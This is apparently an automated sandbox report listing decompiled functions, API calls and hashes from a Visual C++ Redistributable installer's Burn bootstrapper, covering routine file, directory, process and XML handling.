                                                                          			E000307E4(signed int __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				union _LARGE_INTEGER* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _t32;
				signed short _t36;
				signed short _t41;
				signed short _t42;
				void* _t46;
				union _LARGE_INTEGER _t52;
				signed int _t55;
				signed int _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t64;

				_t55 =  *0x7aac0; // 0x0
				_t61 = 0;
				_v16 = 0;
				_v12 = 0;
				_t60 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t55 * 4)) + 4));
				_t32 = _a12;
				if(_t32 == 0) {
					asm("cdq");
					_t56 = __edx;
					_t52 = _a8.LowPart +  *((intOrPtr*)(_t60 + 8));
					asm("adc ecx, [edi+0xc]");
					goto L7;
				} else {
					_t46 = _t32 - 1;
					if(_t46 == 0) {
						asm("cdq");
						_t52 = _a8.LowPart;
						_t56 = __edx;
						goto L7;
					} else {
						if(_t46 == 1) {
							_t56 =  *(_t60 + 0x14);
							asm("adc ecx, [edi+0xc]");
							asm("cdq");
							_t52 =  *((intOrPtr*)(_t60 + 0x10)) +  *((intOrPtr*)(_t60 + 8)) + _a8.LowPart;
							asm("adc ecx, edx");
							L7:
							_v8 = _t56;
							_t36 = E000311CF(__eflags, _t60 + 0x1c, _a4, _t52, _t56,  &_v16, _a12);
							__eflags = _t36;
							if(_t36 == 0) {
								L10:
								_t25 =  &_v16;
								 *_t25 = _v16 -  *((intOrPtr*)(_t60 + 8));
								__eflags =  *_t25;
							} else {
								_push(_a12);
								_t41 = SetFilePointerEx(_a4, _t52, _v8,  &_v16); // executed
								__eflags = _t41;
								if(_t41 != 0) {
									goto L10;
								} else {
									_t42 = GetLastError();
									__eflags = _t42;
									_t64 =  <=  ? _t42 : _t42 & 0x0000ffff | 0x80070000;
									__eflags = _t64;
									_t61 =  >=  ? 0x80004005 : _t64;
									E000137D3(0x80004005, "cabextract.cpp", 0x345, _t61);
									E0005012F(_t61, "Failed to move file pointer 0x%x bytes.", _a8);
								}
							}
						} else {
							_t61 = 0x80070057;
							_push("Invalid seek type.");
							E0005012F();
							_t56 = 0x80070057;
						}
					}
				}
				 *((intOrPtr*)(_t60 + 0x30)) = _t61;
				_t39 =  <  ? _t56 | 0xffffffff : _v16;
				return  <  ? _t56 | 0xffffffff : _v16;
			}

















                                                                          0x000307ea
                                                                          0x000307fc
                                                                          0x000307fe
                                                                          0x00030801
                                                                          0x00030804
                                                                          0x0003080d
                                                                          0x0003080f
                                                                          0x00030855
                                                                          0x00030858
                                                                          0x0003085a
                                                                          0x0003085d
                                                                          0x00000000
                                                                          0x00030811
                                                                          0x00030811
                                                                          0x00030814
                                                                          0x0003084b
                                                                          0x0003084c
                                                                          0x0003084e
                                                                          0x00000000
                                                                          0x00030816
                                                                          0x00030819
                                                                          0x0003083b
                                                                          0x0003083e
                                                                          0x00030841
                                                                          0x00030842
                                                                          0x00030844
                                                                          0x00030860
                                                                          0x00030866
                                                                          0x00030873
                                                                          0x00030878
                                                                          0x0003087a
                                                                          0x000308d5
                                                                          0x000308d8
                                                                          0x000308d8
                                                                          0x000308d8
                                                                          0x0003087c
                                                                          0x0003087c
                                                                          0x0003088a
                                                                          0x00030890
                                                                          0x00030892
                                                                          0x00000000
                                                                          0x00030894
                                                                          0x00030894
                                                                          0x000308a3
                                                                          0x000308a5
                                                                          0x000308ad
                                                                          0x000308af
                                                                          0x000308bd
                                                                          0x000308cb
                                                                          0x000308d0
                                                                          0x00030892
                                                                          0x0003081b
                                                                          0x0003081b
                                                                          0x00030820
                                                                          0x00030826
                                                                          0x0003082c
                                                                          0x0003082c
                                                                          0x00030819
                                                                          0x00030814
                                                                          0x000308db
                                                                          0x000308e8
                                                                          0x000308ef

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0003088A
                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00030894
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                          • API String ID: 2976181284-1358093670
                                                                          • Opcode ID: 4e6206332a51bdc7266a1abc502de69d8d9e9965ef4894c2e7ec4fb6e878052f
                                                                          • Instruction ID: a9e83e88f69e8113b04846c1f37ee69044ad20e2386b2703caa668d045d63107
                                                                          • Opcode Fuzzy Hash: 4e6206332a51bdc7266a1abc502de69d8d9e9965ef4894c2e7ec4fb6e878052f
                                                                          • Instruction Fuzzy Hash: A931AF31A0161AFFDB15DFA9CC959AEB7A9FF08720F008229F919A7651D730ED108BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054932 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00054932(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				void* _v8;
				char _v12;
				char _v16;
				long _t15;
				char* _t18;
				long _t25;
				intOrPtr _t28;
				void* _t31;
				int _t32;

				_t15 =  &_v8;
				_push(_t15);
				_push(_a4);
				_t32 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				L000594F0(); // executed
				_t25 = _t15;
				if(_t25 != 0) {
					L4:
					_t16 = GlobalAlloc(0, _t25);
					_t31 = _t16;
					if(_t31 != 0) {
						_push(_t31);
						_push(_t25);
						_push(_v8);
						_push(_a4);
						L00059500(); // executed
						if(_t16 != 0) {
							L10:
							_push( &_v16);
							_t18 =  &_v12;
							_push(_t18);
							_push("\\");
							_push(_t31);
							L00059510();
							if(_t18 != 0) {
								L13:
								_t28 = _v12;
								 *_a8 =  *((intOrPtr*)(_t28 + 8));
								 *_a12 =  *((intOrPtr*)(_t28 + 0xc));
							} else {
								_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
								if(_t32 >= 0) {
									goto L13;
								} else {
									_push(_t32);
									_push(0x122);
									goto L9;
								}
							}
						} else {
							_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
							if(_t32 >= 0) {
								goto L10;
							} else {
								_push(_t32);
								_push(0x11d);
								L9:
								_push("fileutil.cpp");
								E000137D3(_t22);
							}
						}
						GlobalFree(_t31);
					} else {
						_t32 = 0x8007000e;
						_push(0x8007000e);
						_push(0x119);
						goto L3;
					}
				} else {
					_t32 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
					if(_t32 >= 0) {
						goto L4;
					} else {
						_push(_t32);
						_push(0x115);
						L3:
						_push("fileutil.cpp");
						E000137D3(_t16);
					}
				}
				return _t32;
			}












                                                                          0x0005493b
                                                                          0x00054940
                                                                          0x00054941
                                                                          0x00054944
                                                                          0x00054946
                                                                          0x00054949
                                                                          0x0005494c
                                                                          0x0005494f
                                                                          0x00054954
                                                                          0x00054958
                                                                          0x00054987
                                                                          0x00054989
                                                                          0x0005498f
                                                                          0x00054993
                                                                          0x000549a2
                                                                          0x000549a3
                                                                          0x000549a4
                                                                          0x000549a7
                                                                          0x000549aa
                                                                          0x000549b1
                                                                          0x000549dd
                                                                          0x000549e0
                                                                          0x000549e1
                                                                          0x000549e4
                                                                          0x000549e5
                                                                          0x000549ea
                                                                          0x000549eb
                                                                          0x000549f2
                                                                          0x00054a14
                                                                          0x00054a14
                                                                          0x00054a1d
                                                                          0x00054a25
                                                                          0x000549f4
                                                                          0x00054a05
                                                                          0x00054a0a
                                                                          0x00000000
                                                                          0x00054a0c
                                                                          0x00054a0c
                                                                          0x00054a0d
                                                                          0x00000000
                                                                          0x00054a0d
                                                                          0x00054a0a
                                                                          0x000549b3
                                                                          0x000549c4
                                                                          0x000549c9
                                                                          0x00000000
                                                                          0x000549cb
                                                                          0x000549cb
                                                                          0x000549cc
                                                                          0x000549d1
                                                                          0x000549d1
                                                                          0x000549d6
                                                                          0x000549d6
                                                                          0x000549c9
                                                                          0x00054a28
                                                                          0x00054995
                                                                          0x00054995
                                                                          0x0005499a
                                                                          0x0005499b
                                                                          0x00000000
                                                                          0x0005499b
                                                                          0x0005495a
                                                                          0x0005496b
                                                                          0x00054970
                                                                          0x00000000
                                                                          0x00054972
                                                                          0x00054972
                                                                          0x00054973
                                                                          0x00054978
                                                                          0x00054978
                                                                          0x0005497d
                                                                          0x0005497d
                                                                          0x00054970
                                                                          0x00054a36

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0005495A
                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00054989
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 000549B3
                                                                          • GetLastError.KERNEL32(00000000,0005B790,?,?,?,00000000,00000000,00000000), ref: 000549F4
                                                                          • GlobalFree.KERNEL32 ref: 00054A28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1145190524-2299628883
                                                                          • Opcode ID: b45f9da891dab5bbc8a68085fb7b8e001f6ae43dcfbd62e54b47ad150fa53bba
                                                                          • Instruction ID: 1e056817fde012b0f92846e423c25e33b94e104b01e5dfa0384e7f01e0e9056d
                                                                          • Opcode Fuzzy Hash: b45f9da891dab5bbc8a68085fb7b8e001f6ae43dcfbd62e54b47ad150fa53bba
                                                                          • Instruction Fuzzy Hash: C021F235A40329ABE7219BA98C45EEFBBACEF84366F004116FD05E7241E734DC84D6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00014013 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00014013(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8) {
				int _t5;
				long _t7;
				short _t12;
				signed short _t14;
				short* _t17;
				WCHAR* _t19;
				WCHAR* _t21;
				short _t22;

				_t21 = _a4;
				_t22 = 0;
				_t5 = CreateDirectoryW(_t21, _a8); // executed
				if(_t5 != 0) {
					L17:
					return _t22;
				}
				_t7 = GetLastError();
				if(_t7 != 0xb7) {
					if(_t7 == 3 || E000140E2(_t21, 0) == 0) {
						_t8 =  *_t21 & 0x0000ffff;
						_t19 = _t21;
						_t17 = 0;
						if(( *_t21 & 0x0000ffff) == 0) {
							L15:
							_t22 = 0x80070003;
							E000137D3(_t8, "dirutil.cpp", 0x72, 0x80070003);
							goto L16;
						} else {
							_push(0x5c);
							do {
								_t17 =  ==  ? _t19 : _t17;
								_t19 =  &(_t19[1]);
								_t8 =  *_t19 & 0x0000ffff;
							} while (( *_t19 & 0x0000ffff) != 0);
							if(_t17 == 0) {
								goto L15;
							} else {
								 *_t17 = 0;
								_t22 = E00014013(_t21, _a8);
								_t12 = 0x5c;
								 *_t17 = _t12;
								if(_t22 >= 0) {
									if(CreateDirectoryW(_t21, _a8) != 0) {
										_t22 = 0;
									} else {
										_t14 = GetLastError();
										if(_t14 != 0xb7) {
											_t22 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
										} else {
											_t22 = 1;
										}
									}
								}
								L16:
								goto L17;
							}
						}
					} else {
						goto L2;
					}
				}
				L2:
				_t22 = 0;
				goto L17;
			}











                                                                          0x0001401b
                                                                          0x0001401e
                                                                          0x00014021
                                                                          0x00014029
                                                                          0x000140db
                                                                          0x000140df
                                                                          0x000140df
                                                                          0x0001402f
                                                                          0x0001403a
                                                                          0x00014046
                                                                          0x00014054
                                                                          0x00014057
                                                                          0x0001405a
                                                                          0x0001405f
                                                                          0x000140c7
                                                                          0x000140c7
                                                                          0x000140d4
                                                                          0x00000000
                                                                          0x00014061
                                                                          0x00014061
                                                                          0x00014064
                                                                          0x00014067
                                                                          0x0001406a
                                                                          0x0001406d
                                                                          0x00014070
                                                                          0x00014077
                                                                          0x00000000
                                                                          0x00014079
                                                                          0x0001407f
                                                                          0x00014087
                                                                          0x0001408b
                                                                          0x0001408c
                                                                          0x00014091
                                                                          0x0001409f
                                                                          0x000140c3
                                                                          0x000140a1
                                                                          0x000140a1
                                                                          0x000140ac
                                                                          0x000140be
                                                                          0x000140ae
                                                                          0x000140b0
                                                                          0x000140b0
                                                                          0x000140ac
                                                                          0x0001409f
                                                                          0x000140d9
                                                                          0x00000000
                                                                          0x000140d9
                                                                          0x00014077
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014046
                                                                          0x0001403c
                                                                          0x0001403c
                                                                          0x00000000

                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(0001533D,000153B5,00000000,00000000,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D), ref: 00014021
                                                                          • GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 0001402F
                                                                          • CreateDirectoryW.KERNEL32(0001533D,000153B5,00015381,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000), ref: 00014097
                                                                          • GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 000140A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: @Met$dirutil.cpp
                                                                          • API String ID: 1375471231-1953925360
                                                                          • Opcode ID: 8ddf78bdfda0a03335c78edaf01b4637de5464ec0eb121c4a19acd2d2c16daca
                                                                          • Instruction ID: f31e20ed6ddb2ac6a44898cb5edb1099e9e39ed61a8bfbdba265b93dd1ff41c8
                                                                          • Opcode Fuzzy Hash: 8ddf78bdfda0a03335c78edaf01b4637de5464ec0eb121c4a19acd2d2c16daca
                                                                          • Instruction Fuzzy Hash: A511E735A00321AAEB721AE34C44BFBB698DF58B61F114125FF06EB170D7759C9192E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00026915 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 44%
                                                                          			E00026915(WCHAR* _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t10;
				void** _t18;
				void* _t22;
				void* _t23;

				_t18 = _a8;
				_t23 = 0;
				 *_t18 =  *_t18 | 0xffffffff;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16.bInheritHandle = 1;
				_t10 = CreateFileW(_a4, 0x80000000, 5,  &_v16, 3, 0x80, 0); // executed
				_t22 = _t10;
				if(_t22 == 0xffffffff) {
					L10:
					return _t23;
				}
				_push(_t22);
				_push(L"burn.filehandle.self");
				_t23 = E00011F62(_a12, L"%ls -%ls=%u",  *_a12);
				if(_t23 >= 0) {
					_t14 = _a16;
					if(_a16 == 0) {
						L7:
						 *_t18 = _t22;
						_t22 = _t22 | 0xffffffff;
						L8:
						if(_t22 != 0xffffffff) {
							CloseHandle(_t22);
						}
						goto L10;
					}
					_push(_t22);
					_push(L"burn.filehandle.self");
					_t23 = E00011F20(_t14, L"%ls -%ls=%u",  *_t14);
					if(_t23 >= 0) {
						goto L7;
					}
					_push("Failed to append the file handle to the obfuscated command line.");
					L3:
					_push(_t23);
					E0005012F();
					goto L8;
				}
				_push("Failed to append the file handle to the command line.");
				goto L3;
			}








                                                                          0x0002691c
                                                                          0x00026926
                                                                          0x00026928
                                                                          0x0002692b
                                                                          0x00026934
                                                                          0x00026935
                                                                          0x00026944
                                                                          0x0002694b
                                                                          0x00026951
                                                                          0x00026956
                                                                          0x000269c2
                                                                          0x000269c9
                                                                          0x000269c9
                                                                          0x0002695b
                                                                          0x0002695c
                                                                          0x0002696e
                                                                          0x00026975
                                                                          0x00026986
                                                                          0x0002698b
                                                                          0x000269b0
                                                                          0x000269b0
                                                                          0x000269b2
                                                                          0x000269b5
                                                                          0x000269b8
                                                                          0x000269bb
                                                                          0x000269bb
                                                                          0x00000000
                                                                          0x000269b8
                                                                          0x0002698d
                                                                          0x0002698e
                                                                          0x000269a0
                                                                          0x000269a7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000269a9
                                                                          0x0002697c
                                                                          0x0002697c
                                                                          0x0002697d
                                                                          0x00000000
                                                                          0x00026983
                                                                          0x00026977
                                                                          0x00000000

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 0002694B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 000269BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                          • API String ID: 3498533004-3263533295
                                                                          • Opcode ID: ed8e9a00af5437ef3f8471de4259d0170e5827627d55cfe5046a12560384472f
                                                                          • Instruction ID: 1ec482dfa9a3c87faf4da424c37ed5892a23b2c190b421f73970c5502a739499
                                                                          • Opcode Fuzzy Hash: ed8e9a00af5437ef3f8471de4259d0170e5827627d55cfe5046a12560384472f
                                                                          • Instruction Fuzzy Hash: AF110B326007207FD7205A68AC05FAF779DDB49B31F110364FE14BF2D2DB7158558691
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050917 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E00050917(void* __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t9;
				int _t11;
				void* _t14;
				long _t21;

				_t21 = 0;
				_v8 = 0;
				_t9 = WaitForSingleObject(_a4, _a8);
				_v8 = _t9;
				if(_t9 != 0xffffffff) {
					if(_t9 != 0x102) {
						_t11 = GetExitCodeProcess(_a4,  &_v8); // executed
						if(_t11 != 0) {
							 *_a12 = _v8;
						} else {
							_t25 =  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
							_t14 = 0x80004005;
							_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
							_push(_t21);
							_push(0x12a);
							goto L2;
						}
					} else {
						_t21 = 0x80070102;
					}
				} else {
					_t28 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
					_t14 = 0x80004005;
					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
					_push(_t21);
					_push(0x121);
					L2:
					_push("procutil.cpp");
					E000137D3(_t14);
				}
				return _t21;
			}








                                                                          0x0005091f
                                                                          0x00050924
                                                                          0x00050927
                                                                          0x0005092d
                                                                          0x00050933
                                                                          0x0005096a
                                                                          0x0005097a
                                                                          0x00050982
                                                                          0x000509b0
                                                                          0x00050984
                                                                          0x00050995
                                                                          0x00050998
                                                                          0x0005099f
                                                                          0x000509a2
                                                                          0x000509a3
                                                                          0x00000000
                                                                          0x000509a3
                                                                          0x0005096c
                                                                          0x0005096c
                                                                          0x0005096c
                                                                          0x00050935
                                                                          0x00050946
                                                                          0x00050949
                                                                          0x00050950
                                                                          0x00050953
                                                                          0x00050954
                                                                          0x00050959
                                                                          0x00050959
                                                                          0x0005095e
                                                                          0x0005095e
                                                                          0x000509b8

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00050927
                                                                          • GetLastError.KERNEL32(?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00050935
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 1211598281-2144224329
                                                                          • Opcode ID: 9b445aeb7b93d0aa36a6181e05ac839628f414a9c2116f4182718b1b3786cd41
                                                                          • Instruction ID: 8acf90c9adce8c0b1190af9fe1d013ebe221c59d9cf4fb791c0a0fcd0638b0c5
                                                                          • Opcode Fuzzy Hash: 9b445aeb7b93d0aa36a6181e05ac839628f414a9c2116f4182718b1b3786cd41
                                                                          • Instruction Fuzzy Hash: 8F11A132E00325EBFB209BA59C047AF7AD9EF04362F114216FD19EB291D3398D4096E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0005344A
                                                                          • InterlockedIncrement.KERNEL32(0007B6D8), ref: 00053467
                                                                          • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,0007B6C8,?,?,?,?,?,?), ref: 00053482
                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0007B6C8,?,?,?,?,?,?), ref: 0005348E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$IncrementInitializeInterlocked
                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                          • API String ID: 2109125048-2356320334
                                                                          • Opcode ID: dff67dfd71d7fdc6c187720be8019992b6bb0f78f70d4d5bc708582f8e5befbc
                                                                          • Instruction ID: 0deb90031fc079339fa2c181e4579e29aa659cd277e54fa025499bd8570456fa
                                                                          • Opcode Fuzzy Hash: dff67dfd71d7fdc6c187720be8019992b6bb0f78f70d4d5bc708582f8e5befbc
                                                                          • Instruction Fuzzy Hash: DEF0E521B4033557EB225BA5AC0DF173EA4AB81FE7F000414EE09E5194D37CF9858EB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000531C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E000531C7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v20;
				char _v28;
				intOrPtr* _t23;
				void* _t24;
				signed int _t33;
				void* _t35;
				intOrPtr* _t38;
				intOrPtr* _t39;
				void* _t43;
				void* _t44;

				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t43 = 0;
				__imp__#8( &_v28);
				_t23 = _a4;
				_t24 =  *((intOrPtr*)( *_t23 + 0x44))(_t23,  &_v8);
				_t44 = _t24;
				if(_t44 < 0) {
					L9:
					_t38 = _v8;
					if(_t38 != 0) {
						 *((intOrPtr*)( *_t38 + 8))(_t38);
					}
					_t39 = _v12;
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					__imp__#9( &_v28);
					if(_t43 != 0) {
						__imp__#6(_t43);
					}
					return _t44;
				}
				__imp__#2(_a8);
				_t43 = _t24;
				if(_t43 != 0) {
					_t44 = E0005336E( &_v12, _v8, _t43,  &_v12);
					if(_t44 != 1) {
						if(_t44 < 0) {
							goto L9;
						}
						_t33 = _v12;
						_t44 =  *((intOrPtr*)( *_t33 + 0x20))(_t33,  &_v28);
						if(_t44 == 1) {
							goto L4;
						}
						if(_t44 >= 0) {
							_t35 = E000121A5(_a12, _v20, 0); // executed
							_t44 = _t35;
						}
						goto L9;
					}
					L4:
					_t44 = 0x80070490;
					goto L9;
				}
				_t44 = 0x8007000e;
				E000137D3(_t24, "xmlutil.cpp", 0x2a6, 0x8007000e);
				goto L9;
			}















                                                                          0x000531cd
                                                                          0x000531d4
                                                                          0x000531db
                                                                          0x000531dd
                                                                          0x000531e3
                                                                          0x000531ed
                                                                          0x000531f0
                                                                          0x000531f4
                                                                          0x00053262
                                                                          0x00053262
                                                                          0x00053267
                                                                          0x0005326c
                                                                          0x0005326c
                                                                          0x0005326f
                                                                          0x00053274
                                                                          0x00053279
                                                                          0x00053279
                                                                          0x00053280
                                                                          0x00053288
                                                                          0x0005328b
                                                                          0x0005328b
                                                                          0x00053298
                                                                          0x00053298
                                                                          0x000531f9
                                                                          0x000531ff
                                                                          0x00053203
                                                                          0x00053229
                                                                          0x0005322e
                                                                          0x00053239
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005323b
                                                                          0x00053248
                                                                          0x0005324d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053251
                                                                          0x0005325b
                                                                          0x00053260
                                                                          0x00053260
                                                                          0x00000000
                                                                          0x00053251
                                                                          0x00053230
                                                                          0x00053230
                                                                          0x00000000
                                                                          0x00053230
                                                                          0x00053205
                                                                          0x00053215
                                                                          0x00000000

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000531DD
                                                                          • SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                          • VariantClear.OLEAUT32(?), ref: 00053280
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
